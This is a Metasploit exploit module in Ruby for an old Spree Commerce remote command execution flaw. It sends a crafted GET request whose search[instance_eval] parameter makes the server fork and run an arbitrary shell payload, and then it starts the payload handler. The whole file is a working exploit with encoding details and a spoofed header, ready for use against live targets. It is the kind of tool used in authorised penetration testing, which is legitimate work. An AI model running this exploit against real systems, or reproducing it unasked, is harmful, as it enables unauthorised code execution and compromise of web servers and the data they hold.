metasploit-framework/modules/exploits/multi/http/spree_searchlogic_exec.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
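class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Spree Commerce <= 0.50.0: the API's Searchlogic integration hands
  # arbitrary `search[...]` hash keys to Ruby's `send`, so a key of
  # `instance_eval` lets a remote requester evaluate Ruby inside the Rails
  # process and, from there, run shell commands as the web-app user.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Spreecommerce Arbitrary Command Execution',
      'Description'    => %q{
        This module exploits an arbitrary command execution vulnerability in
        the Spreecommerce API searchlogic for versions 0.50.0 and earlier.
        Unvalidated input is called via the Ruby send method allowing command
        execution.
      },
      'Author'         => [ 'joernchen <joernchen[at]phenoelit.de>' ], # Phenoelit
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '71900' ],
          [ 'URL', 'http://www.spreecommerce.com/blog/2011/04/19/security-fixes/' ]
        ],
      # The command runs in the context of the Rails worker, not as root.
      'Privileged'     => false,
      'Payload'        =>
        {
          # The command is wrapped in backticks server-side (see #exploit),
          # so a literal backtick in the payload would cut it short.
          'BadChars'    => "\x60",
          'DisableNops' => true,
          'Space'       => 31337,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Apr 19 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        # Base path of the Spree install; the API endpoint is appended to it.
        OptString.new('URI', [true, "The path to the Spreecommerce main site", "/"])
      ], self.class)
  end

  # Sends one GET to <URI>/api/orders.json whose `search[instance_eval]`
  # value forks the Rails process and executes the encoded payload inside
  # backticks. The HTTP response carries no result; only the status line is
  # logged when one arrives within the short timeout.
  def exploit
    # Hex-encode everything except slashes so the shell command survives the
    # query-string parsing on the server.
    command = Rex::Text.uri_encode(payload.raw, 'hex-noslashes')

    # Ruby source evaluated via Searchlogic's `send(:instance_eval, ...)`.
    # The fork presumably keeps the request handler from blocking on a
    # long-running payload (e.g. a reverse shell).
    ruby_code = "Kernel.fork%20do%60#{command}%60end"

    # normalize_uri joins the segments and collapses duplicate slashes, so the
    # default URI of "/" yields "/api/orders.json" rather than "//api/orders.json".
    # The query string is appended afterwards so normalize_uri never touches it.
    target_path = normalize_uri(datastore['URI'], 'api', 'orders.json')
    request_uri = "#{target_path}?search[instance_eval]=#{ruby_code}"

    res = send_request_raw({
      'uri'     => request_uri,
      'method'  => 'GET',
      'headers' =>
        {
          # Per the original author the header only needs to be present; its
          # value is not checked. NOTE(review): this sends a header literally
          # named HTTP_AUTHORIZATION (the Rack env key) rather than the standard
          # `Authorization` header -- confirm against the target's stack.
          'HTTP_AUTHORIZATION' => 'ABCD',
          'User-Agent'         => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
          'Connection'         => 'Close'
        }
    }, 0.4) # short timeout: the forked payload may keep the request from completing

    print_status("The server returned: #{res.code} #{res.message}") if res

    handler
  end
end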